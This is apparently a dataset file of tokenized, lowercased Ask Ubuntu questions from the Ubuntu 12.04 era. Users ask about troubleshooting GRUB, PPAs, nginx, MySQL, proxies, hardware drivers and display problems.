169539	why if i change my cursor , point to the launcher or the top bar , the cursor gets back to the original ones ?	why if i change my cursor in my virtual machine , point to the launcher or the top bar , the cursor gets back to the original ones ? then when when i come out of the launcher or top bar it is back to my selected cursor ?
169540	issues while running pulseaudio as a not-root user	if i run pulseaudio as a nonroot user ( for example mpd starts it with user `` mpd '' or i start it with my user ) , random noises arises when i try to start or pause , change the volumes , or switching tracks . i also got random noises if i transfer sounds from my notebook to this pulseaudio server , for example , from vlc . if i run pulseaudio from a root user , noises are absent , but mpd ca n't connect to this pulseaudio server and i have no music player .
169541	ubuntu cd install	i am trying to install new version from cd over ubuntu 11.10 oneiric ocelot . i get this error message every time : the installer encountered an unrecoverable error . a desktop session will now be run so that you may investigate the problem or try installing again .
169542	how do i install the latest blender 3d builds from a ppa ?	my problem is that i want to install latest blender and upgrade it automatically via sudo apt-get update & & sudo apt-get upgrade . so , i tried to add a repository sudo add-apt-repository ppa : cheleb/blender-svn sudo apt-get update sudo apt-get install blender so , after the first line executed in terminal it gives me : you are about to add the following ppa to your system : tag : launchpad.net:2008 : redacted more info : https : //launchpad.net/~cheleb/+archive/blender-svn press [ enter ] to continue or ctrl-c to cancel adding it executing : gpg -- ignore-time-conflict -- no-options -- no-default-keyring -- secret-keyring /tmp/tmp.pvnvepb2fl -- trustdb-name /etc/apt/trustdb.gpg -- keyring /etc/apt/trusted.gpg -- primary-keyring /etc/apt/trusted.gpg -- keyserver hkp : //keyserver.ubuntu.com:80/ -- recv tag : launchpad.net:2008 : redacted gpg : `` tag : launchpad.net:2008 : redacted '' not a key id : skipping and when i am running the second line it gives me : w : failed to fetch http : //ppa.launchpad.net/cheleb/blender-svn/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/cheleb/blender-svn/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cheleb/blender-svn/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . q : why this ppa does not work and what should i do to have blender updated automatically ! ? ! thanks
169551	why ca n't i install phusion passenger for nginx ?	i 'm trying to install phusion passenger . passenger-install-nginx-module eventually i got an error permission problems this installer must be able to write to the following directory : /opt/nginx but it ca n't do that , because you 're running the installer as alex . please re-run this installer as root . i tried to do to sudo passenger-install-nginx-module but it says sudo : passenger-install-nginx-module : command not found how do i solve it ?
169561	start ibus on start up	i searched many places and found this killall ibus-daemon and then launch the ibus from dash but i want to have the ibus launched during the startup . is there any permanent solutionrt
169562	after installing nginx with passenger support in '/opt ' , why wo n't it start from 'init.d ' ?	i went through a tutorial http : //craiccomputing.blogspot.com/2010/10/passenger-3-nginx-and-rvm-on-mac-os-x.html and everything was ok . there were no errors . nginx with passenger support was successfully installed . the nginx configuration file ( /opt/nginx/conf/nginx.conf ) must contain the correct configuration options in order for phusion passenger to function correctly . this installer has already modified the configuration file for you ! the following configuration snippet was inserted : http { ... passenger_root /home/alex/.rvm/gems/ruby-1.9.3-p194/gems/passenger-3.0.14 ; passenger_ruby /home/alex/.rvm/wrappers/ruby-1.9.3-p194/ruby ; ... } after you start nginx , you are ready to deploy any number of ruby on rails applications on nginx . however i ca n't start it . alex @ ubuntu : ~ $ sh -x /etc/init.d/nginx start sh : 0 : ca n't open /etc/init.d/nginx sudo /etc/init.d/nginx start sudo : /etc/init.d/nginx : command not found the directory opt/nginx exists and there are files in it . localhost:80 does n't work either . any suggestions ?
169567	blurry chinese fonts in 12.04	lhs browser is in ubuntu 11.10 which renders the chinese text perfectly . rhs however , is in ubuntu 12.04 , which renders blurry chinese . can anyone tell me why ubuntu can not render chinese text clearly in 12.04 ? ?
169568	how do i block a protocol using iptables firewall	how to block a specific protocol using iptables firewall ? for example block yahoo messenger ?
169569	how do i get full-screen to maximize on just one window in a multi-monitor setup ?	also asked @ launchpad : https : //answers.launchpad.net/ubuntu/+source/xserver-xorg-video-ati/+question/196690 on kubuntu 11.10 and below , when i went full-screen ( flash , game , whatever ) , the app full screen took up just one monitor . but after upgrading to 12.04 , it spans both screens , which is ugly on some computers and causes loss of viability on my others where the vertical resolution differs . how do i fix this ? i want full screen to take one monitor ; not span across two . this happens regardless of graphics cards ; fails on both integrated intel cards and nvidia ones . i have three computers ; all have this problem .
169572	backlight settings not stored	recently bought a new laptop ( samsung 700z ) and installed ubuntu 12.04 . most stuff works out of the box , but some details are driving me crazy . i installed the fglrx driver to shut down the fans and also the samsung-tools , so i can change the fan behaviour . but : keys for the keyboard backlight do not work also they are mapped in /lib/udev/rules.d/95-keymap.rules . the cd ejection key does not work . keyboard and screen backlight settings are not stored , so after each reboot , suspend and even screen locks both backlights are set to maximum . using acpi_backlight=vendor in grub does not fix that behaviour , it makes it even worse : i can not set the screen backlight to high values , just about to 30 percent of the possible max . any help would be very appreciated !
169579	ubuntu software center freezes when opened	i have a problem with the software center in ubuntu precise . each time i open it , the software center freezes and i can not work anymore with it ( ubuntu itself continue working without problem , its only the software center ) i usually to work with the terminal , but i 'd like to know if there is any solution for this 'freezing ' problem
169582	how to display in unity an exported gmenu in dbus ?	i can see exported menus with d-feet but unity does n't display them ... any idea , additional documentation or code examples ? this is my code : gmenu *menu = g_menu_new ( ) ; g_menu_append ( menu , `` add '' , `` app.add '' ) ; g_menu_append ( menu , `` del '' , `` app.del '' ) ; g_menu_append ( menu , `` quit '' , `` app.quit '' ) ; gdbusconnection *bus = g_bus_get_sync ( g_bus_type_session , null , null ) ; guint id = g_dbus_connection_export_menu_model ( bus , `` /org/gtk/example/menus/appmenu '' , g_menu_model ( menubar ) , null ) ; g_object_unref ( menu ) ; i wo n't use gtk_application_set_app_menu or libdbusmenu . https : //live.gnome.org/gtk % 2b/gapplication-dbus-apis
169586	how to customize unity 's lenses - e.g . to search photos in one directory ?	i would like to be able to customize unity 's lenses , for instance to make photo lens to search for photos in directories that i mark and the same rule for the music lens . how can i do this ?
169594	i need help copying data from a table in libreoffice base to calc	i am copying the data in a base table and pasting it into a calc spreadsheet . this should just work , but i when i do it , each column from the table is spanning three columns in the spreadsheet . i think it may have something to do with having memo ( longvarchar ) fields in the table . how can i stop this happening ? by the way , there are other format problems . sometimes all data is formatted with strikethrough and underline , but i can sort that out by reformatting cells .
169599	starting tor after logging off then back on	after installing tor , then logging off and back on , i receive the error message : warning before tor can create a control socket in `` /var/run/tor/control '' , the directory `` /var/run/tor '' needs to exist , and to be accessible only by the user account that is running tor
169600	fix grub2 after installing ubuntu 12.04	i 've installed ubuntu 12.04 , but after rebooting i get the message : grub loading : welcome to grub ! error : file '/grub/i386-pc/normal.mod ' not found entering rescue mode ... grub rescue > i have the following partitons setup : /dev/sda6 : /boot ext2 /dev/sda9 : / ext4 /dev/sda8 : swap /dev/sda7 : /home ext4 i guess that some of the prefixes for grub are wrong due to the /boot partition ? or there might be a problem with efi ? the hardware is a 1015bx asus netbook with c-60 amd fusion chipset . how can i fix this grub problem from the rescue prompt ?
169602	can not run ds-timer with wine	i am trying to get this program to run in wine , it goes through the installation process , but then fails to start up . i do n't have the technical know-how myself to find a workaround , it might be something simple ?
169603	are true type fonts ( ttf ) standard on ubuntu ?	i know i can use .ttf ( true type font ) files on windows . if i want to install them i just klick on the file and if its not on the system the font is getting installed . is this the same way on ubuntu ? are .ttf files standard to store fonts ? or is there another standard on linux ? i just would like to know ...
169606	blank screen at login . intel intergrated graphics , ubuntu 12.04	whenever i boot ubuntu 12.04 from grub , it takes me to the login screen but the screen is completely blank ( no backlight at all ) . i 'm running a 64-bit compaq presario cq45 with intel intergrated graphics ( intel ( r ) hd ) . i can connect the laptop to an external display at see ubuntu fine on the external display , but i ca n't see ubuntu on my laptop screen unless i change the resolution down a little and then ubuntu appears on my laptop . but this only lasts for about 30 minutes and the screen goes blank again .
169607	`` partition misaligned by 1024 bytes '' on encrypted lvm	disk utility is giving me the error `` the partition is misaligned by 1024 bytes . this may result in very poor performance . repartitioning is suggested '' on a partition which holds an encrypted lvm . i have looked at this question ( and several like it ) file system is not clean ( the partition is misaligned by 1024 bytes ) however there is an issue caused by the use of an encrypted partition . gparted , for example , can not resize an encrypted volume or the partition which holds it . is there any way to resize the partition to align it properly ? neither disk utility nor gparted will let me do this . edit : this still has n't been solved so i ca n't award the bounty ...
169613	how do i download itunes podcasts with hpodder or other software ?	well , i want to download some lectures from itunes.apple.com , and i 've found a program called hpodder but i really have n't understood how to use it . does anyone here know how to ? or does anyone know a better way ? thank you . ( by the way this is what i am searching to download http : //itunes.apple.com/itunes-u/computer-science-61cl-001/id354819035 ? mt=10 )
169618	is there a way to convert a pdf file to epub format without using calibre	i 'll tell you clearly and loudly : i do n't like calibre ! so , how can i convert pdf to epub without it ?
169622	how to play embedded flash videos in external players ?	as discussed in a separate question , embedded flash videos are abnormally heavy on gpu resources . the answer given by izx here ( and namely in one comment ) shows that ”flash 11+ `` attempts '' ( poorly , it looks like ) to use the gpu ( hardware ) to `` decode '' the video instead of the cpu ( software ) . decoding is a fairly computationally intensive task , but most modern cpus ( except atoms ) will deal with 1080p hd without breaking a sweat.” . so , it seems that a solution would be opening those videos in external players , even without downloading them , so as to put to work the cpu instead of the gpu .
169625	why ca n't i get nova/openstack to use a specific host ?	when i 'm trying to boot instances on a specific host ( sleepy ) by issuing : nova boot -- image mybucket/image.manifest.xml -- flavor m1.tiny -- key_name mykey -- hint force_hosts=sleepy test-vm my vms always seem to start on a random host instead on the one i targeted . does anybody know why that might be ? i 'm using essex and the simple scheduler . my user is admin ( i sourced /var/lib/nova/novarc ) , i also have -- allow_admin_api=true in my nova.conf file . the only mention of filter in my /var/log/nova-scheduler.log is u'filter_properties ' : { u'scheduler_hints ' : { u'force_hosts ' : u'sleepy ' } } . this file also says u'_context_is_admin ' : true and u'_context_roles ' : [ u'admin ' ]
169627	creating user account & pasting files in desktop remotely ?	i need to create a seperate user account in all the systems . and i have to paste few files in their desktop . i have created a seperate useraccount with password remotely . however when i type ls /home/username only examples.desktop file is shown there . there is no desktop , music , videos , documents folder etc etc . i know after logging in to that account physically the system creates folder for new users automatically . but is there any other way to acheive this task ? coz i need to create user account for more than 200 systems . update : clear solution will get bounty . update 1 : accessing the system via ssh . yes the user account must have a password .
169629	12.04 update is stuck on preconfiguring packages	for a while i have the problem mentioned in the title . update is stuck on pre-configuring packages without any other error . i tried almost everything i 've found searching google , but it did n't solve my problem . btw sudo apt-get update sudo apt-get autoclean sudo apt-get clean sudo apt-get autoremove sudo apt-get update & & sudo apt-get upgrade is not working . can somebody please help me fix this issue ?
169631	lost my root access and unable to install any software or any other priviliged operations	i have been using precise pangolin and i am into a problem now : ( i was trying to add my current user to the group vboxusers.. so i used the command , sudo usermod -g vboxusers myusername and it got succeded too . but after adding like that , i am unable to perform any sudo operations . whenever i use a sudo command i get an error message stating `` myusername is not in sudoers file '' . i tried enabling root account also . but i could n't . how to fix this issue ?
169637	change boot hard drive dell dimension 9150	does anyone here know how to change what hard drive the dell dimension 9150 boots to ? mine is always booting to the first one , win7 , when i want to boot to the second one , ubuntu 12.04 .
169639	can i use custom boot screens on 12.04	the question says it all really , but also can i use a video for the boot screen and if so how would i achieve this , what folder do i put it in and what format must it be ? thanks . edit : is there any alternitives to plymouth that work well the genral opinion online is plymouth is a bit crap .
169640	how to rename and move thousands of files at once ?	i have many files that i want to move into folders , their names are something like this dir1/dir2/dir3/name_of_file.ex and then maybe another is called /dir4/name_of_file2.xe is there anyway of moving those files into the directory dir1/dir2/dir3 and change the name of it to only name_of_file.ex automatically ? i really do n't know how i can explain it easier.. but i have almost a 1000 files with names like tsdata\res\catalog\scripts\deckfoundations.txt and tsbin\sims2.exe and what i want to do with those files is to move into the folder tsdata\res\catalog\scripts\ and then rename the file to only deckfoundations.txt . do n't know if you know php but there you have a explode function where you explode the name of the file with a character $ ar = end ( explode ( `` / '' , $ filename ) ) ; print_r ( $ ar ) ; would output something like this array ( [ 0 ] = > tsdata\res\catalog\scripts [ 1 ] = > deckfoundations.txt ) then with that i could use the first row to create the folder if not existing and then rename the full $ filename to the second row of $ ar
169642	enable intel graphics card on hybrid setup	because my radeon hd 5400 card is getting too hot , i want to fall back on the intel card . how do i do this ?
169644	diagnosing persistent flash streaming failure for drm content	i 'm trying to implement the fixes from adobe ( as mentioned in this other question ) but i 'm having no success . i 'm running 64-bit 12.04 . when i try the flash test as described on this adobe guide : first , launch the adobe demo video player container : http : //drmtest2.adobe.com:8080/svp/samplevideoplayer_fp.html note the adobe flash player version in the lower left of the demo video shell . make sure that indicate 11.2 or higher play sample protected content . enter the following url in the field `` input the video url : ( case-sensitive ) http : //drmtest2.adobe.com:8080/content/anonymous.f4v press the [ play ] button at the bottom of the video container . well that does n't work . from that test page , when i select the `` show drm events '' checkbox i get `` error # 3344 [ missingadobecpmodule ] '' , and then it just sits there and nothing plays . i 've installed the hal ( several times ) and cleared out the directories from my home .adobe directory as those instructions say , restarted firefox , etc . the flash info page says `` you have version 11,2,202,160 installed '' and that 236 is the more up-to-date version , but i ca n't figure out how to install that . ( i 've tried , but to no avail ; i just end up with 160 ) . so does anybody have ideas on what to do to make this work ?
169653	installing audio libaries for pymedia	i am building pymrdia from a tarball , but when i install i get : using unix configuration ... ogg : not found vorbis : not found faad : not found mp3lame : not found vorbisenc : not found alsa : not found how can i install these ?
169655	why is n't writing the iso image to my usb flash drive working ?	i have a 8gb flash drive , and another 1gb flash drive that contains an iso file of xubuntu 12.04 . i am trying to write this iso image on to my 8gb drive , so that i can boot into it and install xubuntu on my hard drive . currently , i am running the same xubuntu version from a live cd -- i messed up while writing so i ca n't install it using the cd . my hdd is empty , there is no os on it yet . i have tried both using dd to write the image , however when i boot nothing happens -- just a white cursor blinks . i also tried the same with unetbootin , however i get the same result . no splash screens or other messages appear , just the cursor when booting from the flash drive . it 's not an issue with my drive/bios as i 've written images to it before ( on windows ) . both of these were written on the drive with a freshly-formatted ntfs partition . does anyone know any tools that will do this successfully , or know how i can solve the blinking cursor issue ? cheers !
169666	fonts look ugly in kubuntu 12.04 after setting resolution to 1440x900	i 'm currently using kubuntu 12.04 and after installing nvidia drivers and setting resolution up to 1440x900 limit , fonts look ugly , only browser content fonts work well , i tried fixing them using fonts-kde contol module , but it did n't work , please help here is a screenshot
169675	need help with usb speakers	i am a first time user of ubuntu . i recently installed it as a dualboot with windows 7 . i have logitech usb speakers which work fine in windows . however , i ca n't get any audio to play in ubuntu . any help would be appreciated . here is an output from the terminal : home @ ubuntu : ~ $ aplay -l **** list of playback hardware devices **** card 0 : intel [ hda intel ] , device 0 : alc887 analog [ alc887 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 0 : intel [ hda intel ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : audio [ usb audio ] , device 0 : usb audio [ usb audio ] subdevices : 0/1 subdevice # 0 : subdevice # 0
169677	not only tv usb tuner not working	how can i install a not only tv usb tuner on ubuntu 12.04 ? are there any drivers for it ?
169679	how do install ubuntu tv on 12.04 ?	all the guides for installing ubuntu tv seem to be made for ubuntu 11.10 how can i install ubuntu tv on ubuntu 12.04 ? there is videos on youtube showing it - but i am not able to install neither by compiling ( error while compiling ) nor by ppas that have been published by omgubuntu in january . thanks
169687	`` docky needs composition enabled '' message even after i enabled that , in xubuntu	i am using ubuntu 12.04 with xubuntu-desktop because i need to use xubuntu sometimes .i have installed docky for quick access . but i am not getting it properly because of the error . details you can find in image i have uploaded . i have enabled composite already but still i got this . edit : same problem with lubuntu environment also . how can i solve this . .
169688	install tp-link tl-wn722n on ubuntu 10.04	i have a tp-link tl-wn722n usb wireless card and can not get it to install . i found lots of information but i have not touched my ubuntu machine in 4 months and basically forgot what little knowledge i had . i need somebody to translate this down to linux preschooler level for me . after reading this post , i was out of luck : how to install wireless antenna tp-link tl-wn722n ? i found a driver at http : //linuxwireless.org/en/users/devices/usb backed up by some newegg reviews . this is where the download is , but it might as well be written in arabic because i can not make any sense of it . http : //linuxwireless.org/en/users/download is there an easier way to make this work or at least somebody that can explain this in the same manner they explain how to use a cell phone to their grandparents ? i am using a 7 year old laptop would i just be better upgrading to ubuntu 12.04 ?
169691	how to do a automatic shutdown when dropbox stops synching ?	is it possible , or rather is there a way to automatically shutdown ubuntu ( i 'm running 12.04 ) when dropbox stops synching ? that would really suit my needs and cut power consumption . thanks beforehand .
169692	error : prefix not set - unable to install ubuntu 12.04 64bit	i am using ubuntu 12.04 lts 32 bit .. later i came to know that my lappy has 64 bit processor ... so i downloaded ubuntu 12.04 lts 64 bit and wrote that image to dvd ... and tried to ( as i want to try dual boot ) ... when selected boot from dvd its giving `` error : prefix not set `` and a wierd screen ... then i had to reboot forcibly ... tried 4 times but couldnt install ... i checked the md5 and its matching ... please help me how to install ubuntu 12.04 lts 64bit ... . i am able to install that in virtual matchine and its working fine ... please guide me how to install ... thanks in advance , ramakrishna g
169698	how can i change the public ip address ?	i have kubuntu 12.04 installed on dual boot with windows 7 , when i search for my ip on google , i get different results : one ip for windows 7 , and other for kubuntu ( it says also no proxy detected ) i was banned from a certain webpage , they say that my user account is banned as well as my computer . i ca n't enter with other newly created accounts , but with kubuntu , i can enter with no problems ( not same banned account , but the same computer , that means they banned the ip address only ) . how can i change my ip address on kubuntu to another , in case they detect that is the same computer , or i get banned again ? i am using default network manager . i receive internet from a router with dchp enabled , and other computers connected to the router . on windows 7 i sometimes use the virtual wifi miniport to share internet with a laptop and that laptop gets different ip addresses each time i create the network .
169700	how do i fix panic occurred error after installing dual-boot ubuntu 12.04 alongside win 7 ?	i first attempted to install ubuntu on my usb drive . that worked just fine , but for reasons that were n't obvious to me then , it worked unbearably slow . so i instead attempted to install ubuntu alongside my win 7 install . i used the `` install alongside ... '' option , and it seemed to work well until the reboot occurred , and my computer would automatically load windows . grub just did n't want to start . keep in mind i allocated 20gb to ubuntu during this attempt , and i did n't have my internet connected . i cleared the ubuntu partition and joined it back to the partition that holds win 7 ( by extending the win 7 partition ) , and simply attempted another install . i followed the same steps as last time , only i allocated 50gb to ubuntu , and i had my internet connected . the install took all night long . i had to leave my system on overnight and cross my fingers that it would work . it especially took forever when downloading language packages . now grub loads . it gives me a number of options ( i do n't have the grub screen in front of me so please forgive me for paraphrasing the options ) : 1 . boot linux on ubuntu normally . 2 . boot linux on ubuntu in recovery mode . 3 . run checkdisk . 4 . another option that involves checkdisk . 5 . boot windows 7 on sda1 . 6 . boot windows 7 on sda2 . whenever i choose option 1 , i get a terminal screen that flashes a bunch of processes on the screen and ends with `` panic occurred . rebooting in 30 seconds . '' this happens every time . i chose option 2 , and within recovery mode i attempted to repair . the repair process attempted to download files and each attempt failed . i then attempted to enable networking within recovery mode , and it just flashed a bunch of processes and , without saying panic occurred , said `` rebooting in 30 seconds '' and rebooted . i have n't tried either checkdisk or memcheck options ( now that i think of it i think it does say memcheck instead of checkdisk ) . choosing option 5 boots windows 7 normally with no problems ( so far ) . choosing option 6 starts windows 7 , but then reboots my computer . is there any way i can repair ubuntu without having to wipe its partition and start again from scratch ? the installation process took quite a long time to complete and i 'd rather there be ( if there is any ) a more simpler process of getting ubuntu to work on my system alongside win 7 . thank you for your help ! update : i reinstalled on the 50gb partition without connecting to the internet , and i 'm getting the exact same problem .
169702	contradictory information about hdd	from couple of days my hdd works slow . so i test my hdd using disk utility . it shows i have 1352 bad blocks . smart test says hdd health is good but shows a error `` reallocated sector count '' . so i run # badblocks . but it shows 0 badblocks sudo badblocks -v /dev/sda 0 badblocks found then i run hdparams sudo hdparm -tt /dev/sda /dev/sda : timing cached reads : 2 mb in 2.70 seconds = 759.55 kb/sec timing buffered disk reads : 172 mb in 3.02 seconds = 56.99 mb/sec then i run benchmark test using disk utility . here it shows read/write speed is 69.6 mb/s but hdparm shows 759.55 kb/sec , smart says hdd has bad sectors but badblocks say there are no bad sectors . i am so much confused . i had already submit my laptop for hdd change ( valid warranty ) , but they refused to change it and they said there are no bad sectors ( they used windows 's tools ) . but hdd performance is poor . system specification : cpu : dualcore e-450 amd apu ram : 2gb hdd : toshiba 320 gb laptop model : acer aspire 4250 there should be any way that we can prevent sata controller to reallocate bad blocks . then we can find out the bad blocks and mark unused by fsck . after that enable reallocation again . so ubuntu will not call for bad sectors and reallocation will be zero and also it reduce the rate of new bad sectors .
169703	responding very slow while loading icons	i have just installed xubuntu 12.04 x32 from a usb on to my hard drive . it installed fine , however now when i boot up and log in to my user , it seems to be rather slow -- notifications at the top right have sort of a gray shadow background , probably a transparacy bug ( however this fixes itself after a while ) . it takes about a minute for the xfce panel to load completely as well ask the desktop . when i click the menu icon , it freezes for about half a minute . when i hovered over a section , for example settings , the options showed however the icons were still loading , and my computer froze for about two minutes , when the icons then appeared . i am not completely sure what the cause is , but after about five minutes after everything settles fine . it 's quite annoying to have to wait ~10 minutes for xubuntu to start up , so does anyone know what the issue could possibly be , and how i could fix it ? please let me know if more information is required . thanks !
169704	how to search dconf for keys or values ?	i loaded dconf-editor . there is no menu , but i did discover that you can press ctrl+f and enter a search term . however , i do not know what ctrl+f actually searches . when i enter a term ( e.g . panel or unity-greeter ) , i receive no results . i have also tried gsettings at the command line , but with no luck whatever options i have tried ; i must be doing it incorrectly . how do i search for a specific key or value within dconf ?
169708	i ca n't reach phpmyadmin	i have installed php , apache and mysql . after phpmyadmin using this code : sudo apt-get install phpmyadmin i can see any problem when i 'm installing phpmyadmin . but i ca n't reach . i fellow this resource , when i installing package .
169710	burn a cd on mac on osx	i followed the instructions and burnt a cd but when i booted with the the cd while holding c at startup on my mac nothing happens ! when i want to see the content , it says `` the disk you inserted was not readable by this computer '' what do i do ? osx : mountain lion
169715	unable to install unity revamped -- ppa : ikarosdev/unity-revamped	i intend to use a forked version of unity ( ppa : ikarosdev/unity-revamped ) over the original one . the problem i 'm facing is that the forked version is 5.12.0-0ubuntu3 and the original one is 5.14.0-0ubuntu1 . sudo apt-add-repository ppa : ikarosdev/unity-revamped sudo apt-get update sudo apt-get upgrade using the above commands gives me the following output . reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . any help ? links https : //launchpad.net/~ikarosdev/+archive/unity-revamped https : //launchpad.net/ubuntu/precise/+source/unity/5.14.0-0ubuntu1
169716	mysql - unable to connect as root	i have need to connect to mysql server 5.5 and create database using command line . ideally it would be using a ui utility but i do n't have it . here is an issue : alex @ ubuntu : ~ $ sudo mysql -u root error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) however i definitely set password while i was installing mysql server . what should i do to solve it ?
169719	proxy authentication in the software center	i 'm trying to install a package on ubuntu 12.04 , but i get the error 407 proxy authentication required how can i configure the software center to use my proxy ? w : failed to fetch cdrom : //ubuntu 12.04 lts _precise pangolin_ - release amd64 ( 20120425 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/source/sources 407 proxy authentication required w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.canonical.com/ubuntu/dists/precise/partner/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/universe/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/restricted/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/universe/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-updates/multiverse/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/main/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/universe/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/main/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/restricted/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/universe/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-backports/multiverse/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/restricted/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/main/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/universe/source/sources 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-amd64/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/restricted/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages 407 proxy authentication required w : failed to fetch http : //archive.ubuntu.com/ubuntu/dists/precise-security/multiverse/binary-i386/packages 407 proxy authentication required e : some index files failed to download . they have been ignored , or old ones used instead .
169722	dual boot installation	i would like to install ubuntu on a seperate harddrive to my windows file system . i have a harddrive installed in the computer that shall be used solely for a linux system . i thought i 'd try to install with the windows installer , but it ca n't see the linux harddrive - probably because it 's already had linux on it before and windows refuses to recognize it . although , windows can see the harddrive in the device manager , it 's not showing in `` my computer '' . do i have to download the full install cd , or is there a workaround for this so i can still use the windows installer ?
